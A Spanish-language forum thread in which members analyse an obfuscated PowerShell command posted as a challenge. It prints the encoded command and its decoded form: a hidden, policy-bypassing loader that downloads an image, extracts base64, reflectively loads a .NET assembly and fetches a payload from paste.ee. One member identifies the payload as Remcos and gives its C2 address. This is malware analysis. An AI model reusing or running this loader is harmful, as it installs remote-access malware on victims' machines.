RETO 🃏👁️‍🗨️ ¿Qué me podéis decir de esto?


destapeman

destapeman

FUCK PUSSYS, YES BADASS
Moderador
Paladín de Nodo
Jinete de Nodo
Burgués de Nodo
Noderador
Nodero
Noder
Buenas noders,

¿Qué me podéis decir de esto?

Código: 
"powershell.exe" -command "$código ='JDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVQByDgTreGwDgTreIDgTreDgTre9DgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredwBhDgTreGwDgTrebDgTreBwDgTreGEDgTrecDgTreBlDgTreHIDgTreYwBhDgTreHYDgTreZQDgTreuDgTreGMDgTrebwBtDgTreC8DgTredQB3DgTreHDgTreDgTreLwB1DgTreHcDgTrecDgTreDgTre0DgTreDIDgTreNDgTreDgTre2DgTreDkDgTreNwDgTrexDgTreC4DgTrecDgTreBuDgTreGcDgTreJwDgTre7DgTreCQDgTredwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreTgBlDgTreHcDgTreLQBPDgTreGIDgTreagBlDgTreGMDgTredDgTreDgTregDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreTgBlDgTreHQDgTreLgBXDgTreGUDgTreYgBDDgTreGwDgTreaQBlDgTreG4DgTredDgTreDgTre7DgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBVDgTreHIDgTrebDgTreDgTrepDgTreDsDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEUDgTrebgBjDgTreG8DgTreZDgTreBpDgTreG4DgTreZwBdDgTreDoDgTreOgBVDgTreFQDgTreRgDgTre4DgTreC4DgTreRwBlDgTreHQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBFDgTreE4DgTreRDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTreZQDgTregDgTreDDgTreDgTreIDgTreDgTretDgTreGEDgTrebgBkDgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTredDgTreDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreCsDgTrePQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBTDgTreHUDgTreYgBzDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTresDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTrepDgTreDsDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreQwBvDgTreG4DgTredgBlDgTreHIDgTredDgTreBdDgTreDoDgTreOgBGDgTreHIDgTrebwBtDgTreEIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCkDgTreOwDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTreQQBzDgTreHDgTreDgTrebwBzDgTreGUDgTreLgBEDgTreHIDgTreYQB3DgTreGkDgTrebgBnDgTreFMDgTrecDgTreBlDgTreGMDgTreLgBQDgTreGsDgTreaQBrDgTreEEDgTredDgTreB0DgTreHIDgTreQwBlDgTreHIDgTredDgTreBODgTreEIDgTreJwDgTrepDgTreDsDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreUgB1DgTreG4DgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHDgTreDgTreYQBzDgTreHQDgTreZQDgTreuDgTreGUDgTreZQDgTrevDgTreGQDgTreLwBhDgTreHoDgTredwBvDgTreEQDgTreLwDgTrewDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTreyDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBNDgTreGUDgTreZQBhDgTreGwDgTreZDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTresDgTreCDgTreDgTreJwBMDgTreG4DgTreawBODgTreGEDgTrebQBlDgTreCcDgTreLDgTreDgTrenDgTreEEDgTrecDgTreBwDgTreEwDgTreYQB1DgTreG4DgTreYwBoDgTreCcDgTreKQDgTrepDgTreDgTre=='; $oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"

Un saludo.
 
obtuso

obtuso

5g causa cancer
Jinete de Nodo
Burgués de Nodo
Noderador
Nodero
Noder
parece un script que se ejecuta en una ventana de powershell oculta con prioridad, "como si no quisiese que sepas que se esta ejecutando" al decodificarlo parece que es una variable con el nombre "Abgorkidi", ni puta idea de cual es el contexto, ni que es "Abgorkidi" igual es el ombre de otro script que contiene la info del script o algo por el estilo pero vamos que pinta mal, tampoco te fies mucho de mi idea pero vamos, esto es lo que suelta el decode

1712053408325.png
 
  • Like
Reacciones : destapeman y pvtoari
pvtoari

pvtoari

Attempt to call a nil value
Noderador
Nodero
Noder
No tengo mucha idea de Powershell, pero por lo que he leído parece malware ofuscado.

isc.sans.edu

Remcos Downloader with Unicode Obfuscation - SANS Internet Storm Center

Remcos Downloader with Unicode Obfuscation, Author: Xavier Mertens
isc.sans.edu isc.sans.edu

En particular esa instrucción "-command $OWjuxD" también aparece en el artículo que dejé arriba. No sé qué más se pueda decir...

Si lo que adjunto en el artículo es cierto, esa secuencia de texto larga que en determinado momento se decodifica en una de las instrucciones, podría ser un enlace para descargar un payload o algo que haga cosas que no son de Dios.
 
  • Like
  • De locos
Reacciones : destapeman y obtuso
neeti

neeti

Type Shit
Nodero
Noder
JDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVQByDgTreGwDgTreIDgTreDgTre9DgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredwBhDgTreGwDgTrebDgTreBwDgTreGEDgTrecDgTreBlDgTreHIDgTreYwBhDgTreHYDgTreZQDgTreuDgTreGMDgTrebwBtDgTreC8DgTredQB3DgTreHDgTreDgTreLwB1DgTreHcDgTrecDgTreDgTre0DgTreDIDgTreNDgTreDgTre2DgTreDkDgTreNwDgTrexDgTreC4DgTrecDgTreBuDgTreGcDgTreJwDgTre7DgTreCQDgTredwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreTgBlDgTreHcDgTreLQBPDgTreGIDgTreagBlDgTreGMDgTredDgTreDgTregDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreTgBlDgTreHQDgTreLgBXDgTreGUDgTreYgBDDgTreGwDgTreaQBlDgTreG4DgTredDgTreDgTre7DgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBVDgTreHIDgTrebDgTreDgTrepDgTreDsDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEUDgTrebgBjDgTreG8DgTreZDgTreBpDgTreG4DgTreZwBdDgTreDoDgTreOgBVDgTreFQDgTreRgDgTre4DgTreC4DgTreRwBlDgTreHQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBFDgTreE4DgTreRDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTreZQDgTregDgTreDDgTreDgTreIDgTreDgTretDgTreGEDgTrebgBkDgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTredDgTreDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreCsDgTrePQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBTDgTreHUDgTreYgBzDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTresDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTrepDgTreDsDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreQwBvDgTreG4DgTredgBlDgTreHIDgTredDgTreBdDgTreDoDgTreOgBGDgTreHIDgTrebwBtDgTreEIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCkDgTreOwDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTreQQBzDgTreHDgTreDgTrebwBzDgTreGUDgTreLgBEDgTreHIDgTreYQB3DgTreGkDgTrebgBnDgTreFMDgTrecDgTreBlDgTreGMDgTreLgBQDgTreGsDgTreaQBrDgTreEEDgTredDgTreB0DgTreHIDgTreQwBlDgTreHIDgTredDgTreBODgTreEIDgTreJwDgTrepDgTreDsDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreUgB1DgTreG4DgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHDgTreDgTreYQBzDgTreHQDgTreZQDgTreuDgTreGUDgTreZQDgTrevDgTreGQDgTreLwBhDgTreHoDgTredwBvDgTreEQDgTreLwDgTrewDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTreyDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBNDgTreGUDgTreZQBhDgTreGwDgTreZDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTresDgTreCDgTreDgTreJwBMDgTreG4DgTreawBODgTreGEDgTrebQBlDgTreCcDgTreLDgTreDgTrenDgTreEEDgTrecDgTreBwDgTreEwDgTreYQB1DgTreG4DgTreYwBoDgTreCcDgTreKQDgTrepDgTreDgTre==
 
destapeman

destapeman

FUCK PUSSYS, YES BADASS
Moderador
Paladín de Nodo
Jinete de Nodo
Burgués de Nodo
Noderador
Nodero
Noder
ACTUALIZO QUE NO ESTABA COMPLETO:
Código: 
 "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command
 "$imageUrl = 'https://wallpapercave.com/uwp/uwp4246971.png';
 $webClient = New-Object System.Net.WebClient;
 $imageBytes = $webClient.DownloadData($imageUrl);
 $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);
 $startFlag = '<>';
 $endFlag = '<>';
 $startIndex = $imageText.IndexOf($startFlag);
 $endIndex = $imageText.IndexOf($endFlag);
 $startIndex -ge 0 -and $endIndex -gt $startIndex;
 $startIndex += $startFlag.Length;
 $base64Length = $endIndex - $startIndex;
 $base64Command = $imageText.Substring($startIndex, $base64Length);
 $commandBytes = [System.Convert]::FromBase64String($base64Command);
 $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);
 $type = $loadedAssembly.GetType('Aspose.DrawingSpec.PkikAttrCertNB');
 $method = $type.GetMethod('Run').Invoke($null, [object[]] ('https://paste.ee/d/azwoD/0' , 'desativado' , '2' , 'Meeald' , '1' , 'C:\ProgramData\', 'LnkName','AppLaunch'))"

Ya que @obtuso y más usuarios han visto que estaba ofuscado el BASE64, os ahorro ya ese paso.
 
A

Anonymous (e118)

Anonymous (310a) dijo:
A ver ese último código que has pasado tal y como ha dicho alguno es un óodigo para powershell que descarga una imagen desde una URL dada y la convierte en una cadena de texto en base64, hmmm despues, utiliza la cadena de texto en base64 para cargar una biblioteca de .NET y ejecutará un método específico en esa biblioteca, pasando varios parámetros al método.
Por cierto la imagen que adjuntas no existe (La del respectivo código)

PD: El antivirus me ha detectado el https://paste.ee/d/azwoD/0 como un codigo malicioso
Ver el archivo adjunto 27399

Hmmm el código malicioso que se descarga desde la URL podría utilizar la biblioteca de .NET cargada para realizar acciones maliciosas???

hmmmmmmmmmmmmmmm
Hacer clic para expandir...
No se porqué lo he publicado sin querer en Ánonimo HAHAHHAHAHAHHAA
Da igual.
 
  • Hahaha
Reacciones : destapeman
GreenCash

GreenCash

💲is💲
Burgués de Nodo
Noderador
Nodero
Noder
destapeman dijo:
ACTUALIZO QUE NO ESTABA COMPLETO:
Hacer clic para expandir...

A ver ese último código que has pasado tal y como ha dicho alguno es un óodigo para powershell que descarga una imagen desde una URL dada y la convierte en una cadena de texto en base64, hmmm despues, utiliza la cadena de texto en base64 para cargar una biblioteca de .NET y ejecutará un método específico en esa biblioteca, pasando varios parámetros al método.
Por cierto la imagen que adjuntas no existe (La del respectivo código)
https://wallpapercave.com/uwp/uwp4246971.png
Hacer clic para expandir...
PD: El antivirus me ha detectado el https://paste.ee/d/azwoD/0 como un codigo malicioso
1712078714309.png



Hmmm el código malicioso que se descarga desde la URL podría utilizar la biblioteca de .NET cargada para realizar acciones maliciosas???

hmmmmmmmmmmmmmmm
 
  • Like
Reacciones : destapeman
4rra

4rra

Miembro muy activo
Noderador
Nodero
Noder
Parece que descarga una imagen con privs de admin, tratando de bypasear para luego cargar una instruccion maliciosa de la img?
 
tuco

tuco

Miembro muy activo
Noder
La primera parte pilla el string, primero hace el replace('DgTre','A') y luego eso lo decodificas de base64, te da más o menos lo que has puesto:
Código: 
$imageUrl = 'https://wallpapercave.com/uwp/uwp4246971.png'
$webClient = New-Object System.Net.WebClient
$imageBytes = $webClient.DownloadData($imageUrl)
$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes)
$startFlag = '<<BASE64_START>>'
$endFlag = '<<BASE64_END>>'
$startIndex = $imageText.IndexOf($startFlag)
$endIndex = $imageText.IndexOf($endFlag)
$startIndex -ge 0 -and $endIndex -gt $startIndex
$startIndex += $startFlag.Length
$base64Length = $endIndex - $startIndex
$base64Command = $imageText.Substring($startIndex, $base64Length)
$commandBytes = [System.Convert]::FromBase64String($base64Command)
$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes)
$type = $loadedAssembly.GetType('Aspose.DrawingSpec.PkikAttrCertNB')
$method = $type.GetMethod('Run').Invoke($null, [object[]] ('https://paste.ee/d/azwoD/0' , 'desativado' , '2' , 'Meeald' , '1' , 'C:\ProgramData\', 'LnkName','AppLaunch'))
De ahi básicamente se baja la imagen 'uwp4246971.png' se queda con el contenido en bytes entre las marcas '<<BASE64_START>>' y '<<BASE64_END>>' , decodifica ese base64. Coge estos bytes y los carga. Como la imagen ya no está disponible pues poca historia, pero vamos, toda la pinta de ser un loader.
Continuando con la teoria de que es un loader, que es lo que carga?
Código: 
$method = $type.GetMethod('Run').Invoke($null, [object[]] ('https://paste.ee/d/azwoD/0' , 'desativado' , '2' , 'Meeald' , '1' , 'C:\ProgramData\', 'LnkName','AppLaunch'))
Si vamos a https://paste.ee/d/azwoD/0 vemos que hay algo que parece estar en base64, pero no decodifica correctamente. Recordando el truquito del replace vamos a ver si le han hecho algo al base64.
Ahora, si has analizado malware en el pasado, al ver el final del fichero la cadena QqVT seguramente te suene familiar, ya que TVqQ al decodificar en base64 nos da MZ, el header de un PE (ejecutable de windows).
Descargamos, le damos la vuelta y decodificamos el base64 resultante, nos da un binario con el SHA1 8bc1822ece6cfd98f3d1612e4879d78aa07ac1ae. Lo busco en VT y sale que es el tipico Remcos https://www.virustotal.com/gui/file/6d4c6c6dbe2dd8cf9371766843a3510f8e29cd021fc043006b07c8e03b50bb07
 
  • Like
  • De locos
Reacciones : destapeman y obtuso
tuco

tuco

Miembro muy activo
Noder
El C2 del panel es 74.119.194.217:2701 sriecuad.con-ip.com:2701
Nombre de la campaña: Ecua2

Aquí la config descifrada para los curiosos:
1712199763125.png
 
  • Like
Reacciones : destapeman y obtuso
destapeman

destapeman

FUCK PUSSYS, YES BADASS
Moderador
Paladín de Nodo
Jinete de Nodo
Burgués de Nodo
Noderador
Nodero
Noder
  • Maravilloso
Reacciones : tuco
destapeman

destapeman

FUCK PUSSYS, YES BADASS
Moderador
Paladín de Nodo
Jinete de Nodo
Burgués de Nodo
Noderador
Nodero
Noder
obtuso dijo:
pero es un reto o te estamos haciendo el trabajo
Hacer clic para expandir...
es un reto que me pusieron en una entrevista de trabajo el otro día, que coño me vais a hacer el puto trabajo. Simplemente quería ver el nivel general de quien lo respondiese.
 
  • Hahaha
Reacciones : obtuso
Hay que estar conectado o registrado para responder aquí.
Arriba Pie